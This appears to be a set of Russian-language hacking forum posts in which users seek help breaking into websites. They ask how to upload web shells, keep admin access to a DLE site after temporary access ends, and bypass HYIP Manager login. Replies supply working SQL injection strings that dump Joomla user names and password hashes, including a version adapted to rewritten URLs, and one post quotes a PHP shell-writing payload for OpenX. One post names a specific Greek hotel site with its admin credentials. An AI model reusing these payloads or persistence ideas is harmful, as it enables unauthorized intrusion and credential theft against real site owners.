если можешь поделись скриптом плз можешь в личку ЭТО НЕ СПЕЦ РАЗДЕЛ ДЛЯ ТВОИХ ВОПРОСОВ Здесь не спрашивают как тебе поломать сайт , или что с этим можно сделать//HAXTA4OK
У меня возник вопрос есть сайты у которы структуре php немного изменена Допустим http://www.mister-wong.ru/stuff/#toolbar подвержены ли такие сайты уязвимостям типа sql inj или другим уязвимостям
Уважаемые, несколько раз натыкался на всякие php скрипты - они же exploit-ы к форумам типа IPB и PHPBB, в.т.ч. и 3 версии. Просьба: подскажите тему, где есть полная информация о том как этим делом пользоваться. ОС, софт и тд.. Вот по инъекциям нашел такой ФАК http://www.hackzone.ru/news/sql_inj.html очень мне помог, хотелось бы и по cross site scripting-у В общем в итоге хочется залить шелл, получить админа сайта как минимум. пишите тут или в личку.. Большое спасибо!
Привет всем! народ подскажите пожалуйста что означает вот эта вот ошибочка Code: ! PHP for the selected domain has failed. Installatron is unable to install to a domain where PHP is not working. Your hosting provider can help you resolve this error. Error code: 1; HTTP code: 500 Заранее спасибо!
Привет всем. у меня вопрос качательно сайта стоящего на дле восьмой версии. Короче у меня сейчас еасть доступ к его админ панели и к FTP но это временно, на пару дней примерно еще, вопросто стоит в том, что можно ли чего сделать, чтобы в будущем, иметь хотяб доступ к админке....ну может воткнуть скрипт какой или еще чего?! спасибо заранее за помощь.
Поимел шел на серваке, установлена CMS ModX Где там можно редактировать тэмплэйт шелом? Через админку не интересует. Спасибо!
Всем привет, есть народ который с Openx встречался? тестирую опенх 2.8.0 на локалхосте - http://forum.antichat.ru/thread150144.html вставлаю в баннер код типа <?copy('http://localhost/1.txt', 'x.php');?>test (премисии есть) просматриваю баннер. В броузаке вижу "тест", но х.php отсутствует(GET в access.log тоже нема). Мысли по этому поводу?
Есть сайт с движком HYIP Manager Script подскажите как использовать forwarding для forgot_password. Или как составитить правильный запрос для авторизации без проверки вот я как делаю но не получается $q = 'select * from hm2_users where id = 1' $row["username"];
День добрый, есть сайт на движке Joomla RE 1.0.8.1 Есть на него что-нибудь? про плагины ничего пока не знаю.
у джумлы адрес обычно выглядит таким: index.php?option=com_module&vulnerable_id=178&Blahid=91356 и vulnerable_id - подвержен sql инъекции как обычно: -1+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e),6,....N+from+jos_users-- столкнулся с таким видом: /component/option,com_module/vulnerable_id,178/Blahid,91356/ какой тогда вид скуль запроса должен быть?
Кажется тут заюзан модуль apache: mod_rewrite. Исходя из написанного тобой выше может иметь место следующий запрос: /component/option,com_module/vulnerable_id,-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e),6,....N+from+jos_users--/Blahid,91356/
подскажите пожалуйста как можно залить шелл в Webmin cms или раскрытие путей какое-нибудь вот сайт-пример http://hotel-kyniska.gr/administration/ логин-пасс:kyniska php код в articles фильтруется.